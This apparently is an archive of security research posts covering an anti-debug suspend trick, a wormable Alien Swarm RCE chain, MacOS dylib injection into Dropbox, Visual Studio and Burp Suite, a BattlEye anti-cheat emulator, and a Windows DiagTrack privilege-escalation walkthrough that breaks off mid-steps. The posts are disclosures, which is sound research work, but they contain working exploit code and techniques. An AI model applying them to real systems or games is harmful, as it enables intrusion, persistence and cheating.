  return oldSuspendCount;
}

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.
for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Wormable remote code execution in Alien Swarm

30 October 2020 at 23:00
By: mev

Alien Swarm was originally a free game released circa July 2010. It differs from most Source Engine games in that it is a top-down shooter, though with gameplay elements not dissimilar from Left 4 Dead. Fallen to the wayside, a small but dedicated community has expanded the game with Alien Swarm: Reactive Drop. The game averages about 800 users per day at peak, and is still actively updated.

Over a decade ago, multiple logic bugs in Source and GoldSrc titles allowed execution of arbitrary code from client to server, and vice-versa, allowing plugins to be stolen or arbitrary data to be written from client to server, or the reverse. We’ll be exploring a modern-day example of this, in Alien Swarm: Reactive Drop.

Client <-> Server file upload

Any Alien Swarm client can upload files to the game server (and vice versa) using the CNetChan->SendFile API, although with some questionable constraints: a client-side check in the game prevents the server from uploading files of certain extensions such as .dll, .cfg:

if ( (!(*(unsigned __int8 (__thiscall **)(int, char *, _DWORD))(*(_DWORD *)(dword_104153C8 + 4) + 40))(
         dword_104153C8 + 4,
         filename,
         0)
   || should_redownload_file((int)filename))
  && !strstr(filename, "//")
  && !strstr(filename, "\\\\")
  && !strstr(filename, ":")
  && !strstr(filename, "lua/")
  && !strstr(filename, "gamemodes/")
  && !strstr(filename, "addons/")
  && !strstr(filename, "..")
  && CNetChan::IsValidFileForTransfer(filename) ) // fails if filename ends with ".dll" and more
{ /* accept file */ }
bool CNetChan::IsValidFileForTransfer( const char *input_path )
{
    char fixed_slashes[260];

    if (!input_path || !input_path[0])
        return false;

    int l = strlen(input_path);
    if (l >= sizeof(fixed_slashes))
        return false;

    strncpy(fixed_slashes, input_path, sizeof(fixed_slashes));
    FixSlashes(fixed_slashes, '/');
    if (fixed_slashes[l-1] == '/')
        return false;

    if (
        stristr(input_path, "lua/")
        || stristr(input_path, "gamemodes/")
        || stristr(input_path, "scripts/")
        || stristr(input_path, "addons/")
        || stristr(input_path, "cfg/")
        || stristr(input_path, "~/")
        || stristr(input_path, "gamemodes.txt")
        )
        return false;

    const char *ext = strrchr(input_path, '.');
    if (!ext)
        return false;

    int ext_len = strlen(ext);
    if (ext_len > 4 || ext_len < 3)
        return false;

    const char *check = ext;
    while (*check)
    {
        if (isspace(*check))
            return false;

        ++check;
    }

    if (!stricmp(ext, ".cfg") ||
        !stricmp(ext, ".lst") ||
        !stricmp(ext, ".lmp") ||
        !stricmp(ext, ".exe") ||
        !stricmp(ext, ".vbs") ||
        !stricmp(ext, ".com") ||
        !stricmp(ext, ".bat") ||
        !stricmp(ext, ".dll") ||
        !stricmp(ext, ".ini") ||
        !stricmp(ext, ".log") ||
        !stricmp(ext, ".lua") ||
        !stricmp(ext, ".nut") ||
        !stricmp(ext, ".vdf") ||
        !stricmp(ext, ".smx") ||
        !stricmp(ext, ".gcf") ||
        !stricmp(ext, ".sys"))
        return false;

    return true;
}

Bypassing "//" and ".." can be done with "/\\" because there is a call to FixSlashes that makes proper slashes after the sanity check, and for the ".." the "/\\" will set the path to the root of the drive, so we can write to anywhere on the system if we know the path. Bypassing "lua/", "gamemodes/" and "addons/" can be done by using capital letters e.g. "ADDONS/" since file paths are not case sensitive on Windows.

Bypassing the file extension check is a bit more tricky, so let’s look at the structure sent by SendFile called dataFragments_t:

typedef struct dataFragments_s
{
    FileHandle_t    file;                 // open file handle
    char            filename[260];        // filename
    char*           buffer;               // if NULL it's a file
    unsigned int    bytes;                // size in bytes
    unsigned int    bits;                 // size in bits
    unsigned int    transferID;           // only for files
    bool            isCompressed;         // true if data is bzip compressed
    unsigned int    nUncompressedSize;    // full size in bytes
    bool            isReplayDemo;         // if it's a file, is it a replay .dem file?
    int             numFragments;         // number of total fragments
    int             ackedFragments;       // number of fragments send & acknowledged
    int             pendingFragments;     // number of fragments send, but not acknowledged yet
} dataFragments_t;

The 260 bytes name buffer in dataFragments_t is used for the file name checks and filters, but is later copied and then truncated to 256 bytes after all the sanity checks thus removing our fake extension and activating the malicious extension:

Q_strncpy( rc->gamePath, gamePath, BufferSize /* BufferSize = 256 */ );

Using a file name such as ./././(...)/file.dll.txt (pad to max length with ./) would get truncated to ./././(...)/file.dll on the receiving end after checking if the file extension is valid. This also has the side effect that we can overwrite files as the file exists check is done before the file extension truncation.

Remote code execution

Using the aforementioned remote file inclusion, we can upload Source Engine config files which have the potential to execute arbitrary code. Using Procmon, I discovered that the game engine searches for the config file in both platform/cfg and swarm/cfg respectively:

procmon

We can simply upload a malicious plugin and config file to platform/cfg and hijack the server. This is due to the fact that the Source Engine server config has the capability to load plugins with the plugin_load command:

plugin_load addons/alien_swarm_exploit.dll

This will load our dynamic library into the game server application, granting arbitrary code execution. The only constraint is that the newmapsettings.cfg config file is only reloaded on map change, so you will have to wait till the end of a game.

Wormable demonstration

Since both of these exploits apply to both the server and the client, we can infect a server, which can infect all players, which can carry on the virus when playing other servers. This makes this exploit chain completely wormable and nothing but a complete shutdown of the game servers can fix it.

Timeline

  • [2020-05-12] Reported to Valve on HackerOne
  • [2020-05-13] Triaged by Valve: “Looking into it!”
  • [2020-08-03] Patched in beta branch
  • [2020-08-18] Patched in release

Abusing MacOS Entitlements for code execution

14 August 2020 at 23:00

Recently I disclosed some vulnerabilities to Dropbox and PortSwigger via H1 and Microsoft via MSRC pertaining to Application entitlements on MacOS. We’ll be exploring what entitlements are, what exactly you can do with them, and how they can be used to bypass security products.

These are all unpatched as of publish.

What’s an Entitlement?

On MacOS, an entitlement is a string that grants an Application specific permissions to perform specific tasks that may have an impact on the integrity of the system or user privacy. Entitlements can be viewed with the comand codesign -d --entitlements - $file.

Viewing the entitlements of the main Dropbox binary.

For the above image, we can see the key entitlements com.apple.security.cs.allow-unsigned-executable-memory and com.apple.security.cs.disable-library-validation - they allow exactly what they say on the tin. We’ll explore Dropbox first, as it’s the more involved of the two to exploit.

Dropbox

Just as Windows has PE and Linux has ELF, MacOS has its own executable format, Mach-O (short for Mach-Object). Mach-O files are used on all Apple products, ranging from iOS, to tvOS, to MacOS. In fact, all these operating systems share a common heritage stemming from NeXTStep, though that’s beyond the scope of this article.

MacOS has a variety of security protections in place, including Gatekeeper, AMFI (AppleMobileFileIntegrity), SIP (System Integrity Protection, a form of mandatory access control), code signing, etc. Gatekeeper is akin to Windows SmartScreen in that it fingerprints files, checks them against a list on Apple’s servers, and returns the value to determine if the file is safe to run. `

This is vastly simplified.

There are three configurable options, though the third is hidden by default - App Store only, App Store and identified developers, and “anywhere”, the third presumably hidden to minimize accidental compromise. Gatekeeper can also be managed by the command line tool, spctl(8), for more granular control of the system. One can even disable Gatekeeper entirely through spctl --master-disable, though this requires superuser access. It’s to be noted that this does not invalidate rules already in the System Policy database (/var/db/SystemPolicy), but allows anything not in the database, regardless of notarization, etc, to run unimpeded.

Now, back to Dropbox. Dropbox is compiled using the hardened runtime, meaning that without specific entitlements, JIT code cannot be executed, DYLD environment variables are automatically ignored, and unsigned libraries are not loaded (often resulting in a SIGKILL of the binary.) We can see that Dropbox allows unsigned executable memory, allowing shellcode injection, and has library validation disabled - meaning that any library can be inserted into the process. But how?

Using LIEF, we can easily add a new LoadCommand to Dropbox. In the following picture, you can see my tool, Coronzon, which is based off of yololib, doing the same.

Adding a LoadCommand to Dropbox

import lief

file = lief.parse('Dropbox')
file.add_library('inject.dylib')
file.write('Dropbox')

Using code similar to the following, one can execute code within the context of the Dropbox process (albeit via voiding the code signature - you’re best off stripping the code signature, or it won’t run from /Applications/). You’ll either have to strip the code signature or ad-hoc sign it to get it to run from /Applications/, though the application will lose any entitlements and TCC rights previously granted. You’ll have to use a technique known as dylib proxying - which is to say, replacing a library that is part of the application bundle with one of the same name that re-exports the library it’s replacing. (Using the link-time flags `-Xlinker -reexport_library $(PATH_TO_LIBRARY)).

#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
 {
     printf("Hello from dylib!\n");
     syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
     system("open -a Calculator");
}

This is a simple example, but combined with something like frida-gum the impact becomes much more severe - allowing application introspection and runtime modification without the user’s knowledge. This makes for a great, persistent usermode implant, as Dropbox is added as a LaunchItem.

Visual Studio

Microsoft releases a cut-down version of their premier IDE for MacOS, mainly for C# development with Xamarin, .NET Core, and Mono. Though ‘cut-down’, it still supports many features of the original, including NuGet, IntelliSense, and more.

It also has some interesting entitlements.

Viewing the entitlements of the main Visual Studio binary.

Of course, MacOS users are treated as second class citizens in Microsoft’s ecosystem and Microsoft could not give a damn about the impact this has on the end user - which is similar in impact to the above, albeit more severe. We can see that basically every single feature of the hardened runtime is disabled - enabling the simplest of code injection methods, via the DYLD_INSERT_LIBRARIES environment variable. The following video is a proof of concept of just how easily code can be executed within the context of Visual Studio.

Keep in mind: code executing in this context will inherit the entitlements and TCC values of the parent. It’s not hard to imagine a scenario in which IP (intellectual property) theft could result from Microsoft’s attempts at ‘hardening’ Visual Studio for Mac. As with Dropbox, all the security implications are the same, yet it’s about 30x easier to pull off as DYLD environment variables are allowed.

Burp Suite

I’m sure most reading this article are familiar with Burp Suite. If not - it’s a web exploitation Swiss army knife that aids in recon, pre, and post-exploitation. So why don’t we exploit it?

This time, we’ll be exploiting the Burp Suite installer. As you’ll probably guess by now, it has some… interesting entitlements.

Viewing the entitlements of the Burp Installer stub.

Aside from the output lacking newlines, exploitation in this case is different. There are no shell scripts in the install (nor is the entitlement for allowing DYLD environment variables present), and if we’re going to create a malicious installer, we need to use what’s already packaged. So, we’ll tamper with the included JRE (jre.tar.gz) that’s included with the installer.

There’s actually two approaches to this - replacing a dylib outright or dylib hijacking. Dylib hijacking is similar to it’s partner, DLL hijacking, on Windows, in that it abuses the executable searching for a library that may or may not be there, usually specified by @rpath or sometimes a ‘weakref’. A weakref is a library that doesn’t need to be loaded, but can be loaded. For more information on dylib hijacking, I reccomend this excellent presentation by Patrick Wardle of Objective-See. For brevity, however, we’ll just be replacing a .dylib in the JRE.

The way the installer executes is that it extracts the JRE to a temporary location during install, which is used for the rest of the install. This temporary location is randomized and actually adds a layer of obfuscation to our attack, as no two executions will have the JRE extracted into the same place. Once the JRE is extraced, it’s loaded and attempts to install Burp Suite. This allows us to execute unsigned code under the guise and context of Burp Suite, running code in the background unbenknownst to the user. Thankfully Burp Suite doesn’t (currently) require elevated privileges to install on macOS. Nonetheless, this is an issue due to the ease of forging a malicious installer and the fact that Gatekeeper is none the wiser.

A proof of concept can be viewed below.

Conclusions

Entitlements are both a valuable component of MacOS’ security model, but can also be a double edged sword. You’ve seen how trivivally Gatekeeper and existing OS protections can be bypassed by leveraging a weak application as a trampoline - the one with the most impact in this case I argue to be Dropbox, due to inheritance of Dropbox’s TCC permissions and being a LaunchItem, thus gaining persistence. Thus, entitlements provide a valuable addition to the attack surface of MacOS for any red-teamer or bug-bounty hunter. Your mileage may vary, however - Dropbox and Microsoft didn’t seem to care much. (PortSwigger, on the other hand, admitted that due to the design of Burp Suite and inherent language intrinsics it’s extremely hard to prevent such an attack - and I don’t fault them).

Happy hacking.

Disclosure Timelines


Dropbox

  • June 11th, initial disclosure.
  • June 17th, additional information added
  • June 20th, closed as Informative

Visual Studio

  • June 19th, initial disclosure
  • June 22nd, closed (“Upon investigation, we have determined that this submission does not meet the bar for security servicing. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering. “)

Burp Suite

  • June 27th, initial disclosure
  • June 30th, closed as Informative

BattlEye client emulation

6 July 2020 at 23:00
By: vmcall

The popular anti-cheat BattlEye is widely used by modern online games such as Escape from Tarkov and is considered an industry standard anti-cheat by many. In this article I will demonstrate a method I have been utilizing for the past year, which enables you to play any BattlEye-protected game online without even having to install BattlEye.

BattlEye initialisation

BattlEye is dynamically loaded by the respective game on startup to initialize the software service (“BEService”) and kernel driver (“BEDaisy”). These two components are critical in ensuring the integrity of the game, but the most critical component by far is the usermode library (“BEClient”) that the game interacts with directly. This module exports two functions: GetVer and more importantly Init.

The Init routine is what the game will call, but this functionality has never been documented before, as people mostly focus on BEDaisy or their shellcode. Most important routines in BEClient, including Init, are protected and virtualised by VMProtect, which we are able to devirtualise and reverse engineer thanks to vtil by secret club member Can Boluk, but the inner workings of BEClient is a topic for a later part of this series, so here is a quick summary.

Init and its arguments have the following definitions:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data);
  
enum instance_status
{
    NONE,
    NOT_INITIALIZED,
    SUCCESSFULLY_INITIALIZED,
    DESTROYING,
    DESTROYED
};

struct becl_game_data
{
    char*         game_version;
    std::uint32_t address;
    std::uint16_t port;

    // FUNCTIONS
    using print_message_t = void(*)(char* message);
    print_message_t print_message;

    using request_restart_t = void(*)(std::uint32_t reason);
    request_restart_t request_restart;

    using send_packet_t = void(*)(void* packet, std::uint32_t length);
    send_packet_t send_packet;

    using disconnect_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length, char* reason);
    disconnect_peer_t disconnect_peer;
};

struct becl_be_data
{
    using exit_t = bool(*)();
    exit_t exit;

    using run_t = void(*)();
    run_t run;

    using command_t = void(*)(char* command);
    command_t command;

    using received_packet_t = void(*)(std::uint8_t* received_packet, std::uint32_t length);
    received_packet_t received_packet;

    using on_receive_auth_ticket_t = void(*)(std::uint8_t* ticket, std::uint32_t length);
    on_receive_auth_ticket_t on_receive_auth_ticket;

    using add_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    add_peer_t add_peer;

    using remove_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    remove_peer_t remove_peer;
};

As seen, these are quite simple containers for interopability between the game and BEClient. becl_game_data is defined by the game and contains functions that BEClient needs to call (for example, send_packet) while becl_be_data is defined by BEClient and contains callbacks used by the game after initialisation (for example, received_packet). Note that these two structures slightly differ in some games that have special functionality, such as the recently introduced packet encryption in Escape from Tarkov that we’ve already cracked. Older versions of BattlEye (DayZ, Arma, etc.) use a completely different approach with function pointer swap hooks to intercept traffic communication, and therefore these structures don’t apply.

A simple Init implementation would look like this:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data)
{
    // CACHE RELEVANT FUNCTIONS
    battleye::delegate::o_send_packet    = game_data->send_packet;

    // SETUP CLIENT STRUCTURE
    client_data->exit                   = battleye::delegate::exit;
    client_data->run                    = battleye::delegate::run;
    client_data->command                = battleye::delegate::command;
    client_data->received_packet        = battleye::delegate::received_packet;
    client_data->on_receive_auth_ticket = battleye::delegate::on_receive_auth_ticket;
    client_data->add_peer               = battleye::delegate::add_peer;
    client_data->remove_peer            = battleye::delegate::remove_peer;

    return battleye::instance_status::SUCCESSFULLY_INITIALIZED;
}

This would allow our custom BattlEye client to receive packets sent from the game server’s BEServer module.

Packet handling

The function received_packet is by far the most important routine used by the game, as it handles incoming packets from the BattlEye server component. BattlEye communication is extremely simple compared to how important the integrity of it is. In recent versions of BattlEye, packets follow the same general structure:

#pragma pack(push, 1)
struct be_fragment
{
    std::uint8_t count;
    std::uint8_t index;
};

struct be_packet_header
{
    std::uint8_t id;
    std::uint8_t sequence;
};

struct be_packet : be_packet_header
{
    union 
    {
        be_fragment fragment;

        // DATA STARTS AT body[1] IF PACKET IS FRAGMENTED
        struct
        {
            std::uint8_t no_fragmentation_flag;
            std::uint8_t body[0];
        };
    };
    inline bool fragmented()
    {
        return this->fragment.count != 0x00;
    }
};
#pragma pack(pop)

All packets have an identifier and a sequence number (which is used by the requests/response communication and the heartbeat). Requests and responses have a fragmentation mode which allows BEServer and BEClient to send packets in chunks of 0x400 bytes (seemingly arbitrary) instead of sending one big packet.

In the current iteration of BattlEye, the following packets are used for communication:

INIT (00)

This packet is sent to the BEClient module as soon as the connection with the game server has been established. This packet is only transmitted once, contains no data besides the packet id 00 and the response to this packet is simply 00 05.

START (‘02’)

This packet is sent right after the ‘INIT’ packets have been exchanged, and contains the server-generated guid of the client. The response of this packet is simply the header: 02 00

REQUEST (04) / RESPONSE (05)

This type of packet is sent from BEServer to BEClient to request (and in rare cases, simply transmit) data, and BEClient will send back data for that request using the RESPONSE packet type.

The first request contains crucial information such as service- and integration version, not responding to it will get you disconnected by the game server. Afterwards, requests are game specific.

HEARTBEAT (09)

This type of packet is used by the BEServer module to ensure that the connection hasn’t been dropped. It is sent every 30 seconds using a sequential index, and if the client doesn’t respond with the same packet, the client is disconnected from the game server. This heartbeat packet is only three bytes long, with the sequential index used for synchronization being incremental and therefore easily emulated. An example heartbeat could be: 09 01 00, which is the second heartbeat (sequence starts at zero) transmitted.

Emulation

With this knowledge, it is possible by emulating the entire BattlEye anti-cheat with only two proprietary points of data: the responses for request sequence one and two. These can be intercepted using a tool such as wireshark and replayed as many times as you want for the respective game, because the packet encryption used by BattlEye is static and contextless.

Emulating the INIT packet is as stated simply responding with the sequence number five:

case battleye::packet_id::INIT:
{
    auto info_packet = battleye::be_packet{};
    info_packet.id       = battleye::packet_id::INIT;
    info_packet.sequence = 0x05;

    battleye::delegate::o_send_packet(&info_packet, sizeof(info_packet));
    break;
}

Emulating the START packet is done by replying with the received packet’s header:

case battleye::packet_id::START:
{
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));
    break;
}

Emulating the HEARTBEAT packets is done by replying with the received packet:

case battleye::packet_id::HEARTBEAT:    
{
    battleye::delegate::o_send_packet(received_packet, length);
    break;
}

Emulating the REQUEST packets can be done by replaying previously generated responses, which can be logged with code hooks or man-in-the-middle software. These packets are game specific and some games might disconnect you for not handling a specific request, but most games only require the first two requests to be handled, afterwards simply replying with the packet header is enough to not get disconnected by the game server. It is important to notice that all REQUEST packets are immediately responded to with the header, to let the server know that the client is aware of the request. This is how BottlEye emulates them:

case battleye::packet_id::REQUEST:
{
    // IF NOT FRAGMENTED RESPOND IMMEDIATELY, ELSE ONLY RESPOND TO THE LAST FRAGMENT
    const auto respond = 
        !header->fragmented() || 
        (header->fragment.index == header->fragment.count - 1);

    if (!respond)
        return;

    // SEND BACK HEADER
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));

    switch (header->sequence)
    {
    case 0x01:
    {
        battleye::delegate::respond(header->sequence,
            {
                // REDACTED BUFFER
            });
        break;
    }
    case 0x02:
    {
        battleye::delegate::respond(header->sequence, 
            {    
                // REDACTED BUFFER
            });
        break;
    }
    default:
        break;
    }
    break;
}

Which uses the following helper function for responses:

void battleye::delegate::respond(
    std::uint8_t response_index, 
    std::initializer_list<std::uint8_t> data)
{
    // SETUP RESPONSE PACKET WITH TWO-BYTE HEADER + NO-FRAGMENTATION TOGGLE

    const auto size = sizeof(battleye::be_packet_header) + 
                      sizeof(battleye::be_fragment::count) + 
                      data.size();

    auto packet = std::make_unique<std::uint8_t[]>(size);
    auto packet_buffer = packet.get();

    packet_buffer[0] = (battleye::packet_id::RESPONSE); // PACKET ID
    packet_buffer[1] = (response_index - 1);            // RESPONSE INDEX
    packet_buffer[2] = (0x00);                          // FRAGMENTATION DISABLED


    for (size_t i = 0; i < data.size(); i++)
    {
        packet_buffer[3 + i] = data.begin()[i];
    }

    battleye::delegate::o_send_packet(packet_buffer, size);
}

BottlEye

The full BottlEye project can be found on our GitHub repository. Below you can see this specific project being used in various popular video games.

Fortnite

The following video contains a live demonstration of my BottlEye project being used in the BattlEye-protected game Fortnite. In the video I live debug fortnite while playing online to prove that BattlEye is not loaded.

Insurgency

The following screenshot shows the BattlEye-protected game Insurgency running on Arch in Wine.

Escape from Tarkov

The following screenshot shows the usage of Cheat Engine in the popular, battleye-protected game Escape from Tarkov. This is possible because BattlEye has been replaced with BottlEye on disk.

Thanks to

  • Sabotage
  • Tamimego
  • Atex
  • namazso

Windows Telemetry service elevation of privilege

1 July 2020 at 23:00
By: Jonas L

Today, we will be looking at the “Connected User Experiences and Telemetry service,” also known as “diagtrack.” This article is quite heavy on NTFS-related terminology, so you’ll need to have a good understanding of it.

A feature known as “Advanced Diagnostics” in the Feedback Hub caught my interest. It is triggerable by all users and causes file activity in C:\Windows\Temp, a directory that is writeable for all users.

Reverse engineering the functionality and duplicating the needed interactions was quite a challenge as it used WinRT IPC instead of COM and I did not know WinRT existed, so I had some catching up to do.

In C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2003.1312.0_x64__8wekyb3d8bbwe\Helper.dll, I found a function with surprising possibilities:

WINRT_IMPL_AUTO(void) StartCustomTrace(param::hstring const& customTraceProfile) const;

This function will execute a WindowsPerformanceRecorder profile defined in an XML file specified as an argument in the security context of the Diagtrack Service.

The file path is parsed relative to the System32 folder, so I dropped an XML file in the writeable-for-all directory System32\Spool\Drivers\Color and passed that file path relative to the system directory aforementioned and voila - a trace recording was started by Diagtrack!

If we look at a minimal WindowsPerformanceRecorder profile we’d see something like this:

<WindowsPerformanceRecorder Version="1">
 <Profiles>
  <SystemCollector Id="SystemCollector">
   <BufferSize Value="256" />
   <Buffers Value="4" PercentageOfTotalMemory="true" MaximumBufferSpace="128" />
  </SystemCollector>  
  <EventCollector Id="EventCollector_DiagTrack_1e6a" Name="DiagTrack_1e6a_0">
   <BufferSize Value="256" />
   <Buffers Value="0.9" PercentageOfTotalMemory="true" MaximumBufferSpace="4" />
  </EventCollector>
   <SystemProvider Id="SystemProvider" /> 
  <Profile Id="Performance_Desktop.Verbose.Memory" Name="Performance_Desktop"
     Description="exploit" LoggingMode="File" DetailLevel="Verbose">
   <Collectors>
    <SystemCollectorId Value="SystemCollector">
     <SystemProviderId Value="SystemProvider" />
    </SystemCollectorId> 
    <EventCollectorId Value="EventCollector_DiagTrack_1e6a">
     <EventProviders>
      <EventProviderId Value="EventProvider_d1d93ef7" />
     </EventProviders>
    </EventCollectorId>    
    </Collectors>
  </Profile>
 </Profiles>
</WindowsPerformanceRecorder>

Information Disclosure

Having full control of the file opens some possibilities. The name attribute of the EventCollector element is used to create the filename of the recorded trace. The file path becomes:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack_XXXXXX.etl (where XXXXXX is the value of the name attribute.)

Full control over the filename and path is easily gained by setting the name to: \..\..\file.txt: which becomes the below:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack\..\..\file.txt:.etl

This results in C:\Windows\Temp\file.txt being used.

The recorded traces are opened by SYSTEM with FILE_OVERWRITE_IF as disposition, so it is possible to overwrite any file writeable by SYSTEM. The creation of files and directories (by appending ::$INDEX_ALLOCATION) in locations writeable by SYSTEM is also possible.

The ability to select any ETW provider for traces executed by the service is also interesting from an information disclosure point of view.

One scenario where I could see myself using the data is when you don’t know a filename because a service creates a file in a folder where you do not have permission to list the files.

Such filenames can get leaked by Microsoft-Windows-Kernel-File provider as shown in this snippet from an etl file recorded by adding 22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716 to the WindowsPerformanceRecorder profile file.

<EventData>
 <Data Name="Irp">0xFFFF81828C6AC858</Data>
 <Data Name="FileObject">0xFFFF81828C85E760</Data>
 <Data Name="IssuingThreadId">  10096</Data>
 <Data Name="CreateOptions">0x1000020</Data>
 <Data Name="CreateAttributes">0x0</Data>
 <Data Name="ShareAccess">0x3</Data>
 <Data Name="FileName">\Device\HarddiskVolume2\Users\jonas\OneDrive\Dokumenter\FeedbackHub\DiagnosticLogs\Install and Update-Post-update app experience\2019-12-13T05.42.15-SingleEscalations_132206860759206518\file_14_ProgramData_USOShared_Logs__</Data>
</EventData>

Such leakage can yield exploitation possibility from seemingly unexploitable scenarios.

Other security bypassing providers:

  • Microsoft-Windows-USB-UCX {36DA592D-E43A-4E28-AF6F-4BC57C5A11E8}
  • Microsoft-Windows-USB-USBPORT {C88A4EF5-D048-4013-9408-E04B7DB2814A} (Raw USB data is captured, enabling keyboard logging)
  • Microsoft-Windows-WinINet {43D1A55C-76D6-4F7E-995C-64C711E5CAFE}
  • Microsoft-Windows-WinINet-Capture {A70FF94F-570B-4979-BA5C-E59C9FEAB61B} (Raw HTTP traffic from iexplore, Microsoft Store, etc. is captured - SSL streams get captured pre-encryption.)
  • Microsoft-PEF-WFP-MessageProvider (IPSEC VPN data pre encryption)

Code Execution

Enough about information disclosure, how do we turn this into code execution?

The ability to control the destination of .etl files will most likely not lead to code execution easily; finding another entry point is probably necessary. The limited control over the files content makes exploitation very hard; perhaps crafting an executable PowerShell script or bat file is plausible, but then there is the problem of getting those executed.

Instead, I chose to combine my active trace recording with a call to:

WINRT_IMPL_AUTO(Windows::Foundation::IAsyncAction) SnapCustomTraceAsync(param::hstring const& outputDirectory)

When supplying an outputDirectory value located inside %WINDIR%\temp\DiagTrack_alternativeTrace (Where the .etl files of my running trace are saved) an interesting behavior emerges.

The Diagtrack Service will rename all the created .etl files in DiagTrack_alternativeTrace to the directory given as the outputDirectory argument to SnapCustomTraceAsync. This allows destination control to be acquired because rename operations that occur where the source file gets created in a folder that grants non-privileged users write access are exploitable. This is due to the permission inheritance of files and their parent directories. When a file is moved by a rename operation, the DACL does not change. What this means is that if we can make the destination become %WINDIR%\System32, and somehow move the file then we will still have write permission to the file. So, we know we control the outputDirectory argument of SnapCustomTraceAsync, but some limitations exist.

If the chosen outputDirectory is not a child of %WINDIR%\temp\DiagTrack_alternativeTrace, the rename will not happen. The outputDirectory cannot exist because the Diagtrack Service has to create it. When created, it is created with SYSTEM as its owner; only the READ permission is granted to users.

This is problematic as we cannot make the directory into a mount point. Even if we had the required permissions, we would be stopped by not being able to empty the directory because Diagtrack has placed the snapshot output etl file inside it. Lucky for us, we can circumvent these obstacles by creating two levels of indirection between the outputDirectory destination and DiagTrack_alternativeTrace.

By creating the folder DiagTrack_alternativeTrace\extra\indirections and supplying %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as the outputDirectory we allow Diagtrack to create the snap folder with its limited permissions, as we are inside DiagTrack_alternativeTrace. With this, we can rename the extra folder, as it is created by us. The two levels of indirection is necessary to bypass the locking of the directory due to Diagtrack having open files inside the directory. When extra is renamed, we can recreate %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap (which is now empty) and we have full permissions to it as we are the owner!

Now, we can turn DiagTrack_alternativeTrace\extra\indirections\snap into a mount point targeted at %WINDIR%\system32 and Diagtrack will move all files matching WPR_initiated_DiagTrack*.etl* into %WINDIR%\system32. The files will still be writeable as they were created in a folder that granted users permission to WRITE. Unfortunately, having full control over a file in System32 is not quite enough for code execution… that is, unless we have a way of executing user controllable filenames - like the DiagnosticHub plugin method popularized by James Forshaw. There’s a caveat though, DiagnosticHub now requires any DLL it loads to be signed by Microsoft, but we do have some ways to execute a DLL file in system32 under SYSTEM security context - if the filename is something specific. Another snag though is that the filename is not controllable. So, how can we take control?

If instead of making the mountpoint target System32, we target an Object Directory in the NT namespace and create a symbolic link with the same name as the rename destination file, we gain control over the filename. The target of the symbolic link will become the rename operations destination. For instance, setting it to\??\%WINDIR%\system32\phoneinfo.dll results in write permission to a file the Error Reporting service will load and execute when an error report is submitted out of process. For my mountpoint target I chose \RPC Control as it allows all users to create symbolic links inside.

Let’s try it!

When Diagtrack should have done the rename, nothing happened. This is because, before the rename operation is done, the destination folder is opened, but now is an object directory. This means it’s unable to be opened by the file/directory API calls. This can be circumvented by timing the creation of the mount point to be after the opening of the folder, but before the rename. Normally in such situations, I create a file in the destination folder with the same name as the rename destination file. Then I put an oplock on the file, and when the lock breaks I know the folder check is done and the rename operation is about to begin. Before I release the lock I move the file to another folder and set the mount point on the now empty folder. That trick would not work this time though as the rename operation was configured to not overwrite an already existing file. This also means the rename would abort because of the existing file - without triggering the oplock.

On the verge of giving up I realized something:

If I make the junction point switch target between a benign folder and the object directory every millisecond there is 50% chance of getting the benign directory when the folder check is done and 50% chance of getting the object directory when the rename happens. That gives 25% chance for a rename to validate the check but end up as phoneinfo.dll in System32. I try avoiding race conditions if possible, but in this situation there did not appear to be any other ways forward and I could compensate for the chance of failure by repeating the process. To adjust for the probability of failure I decided to trigger an arbitrary number of renames, and fortunately for us, there’s a detail about the flow that made it possible to trigger as many renames I wanted in the same recording. The renames are not linked to files the diagnostic service knows it has created, so the only requirement is that they are in %WINDIR%\temp\DiagTrack_alternativeTrace and match WPR_initiated_DiagTrack*.etl*

Since we have permission to create files in the target folder, we can now create WPR_initiated_DiagTrack0.etl, WPR_initiated_DiagTrack1.etl, etc. and they will all get renamed!

As the goal is one of the files ending up as phoneinfo.dll in System32, why not just create the files as hard links to the intended payload? This way there is no need to use the WRITE permission to overwrite the file after the move.

After some experimentation I came to the following solution:

  1. Create the folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections
  2. Start diagnostic trace

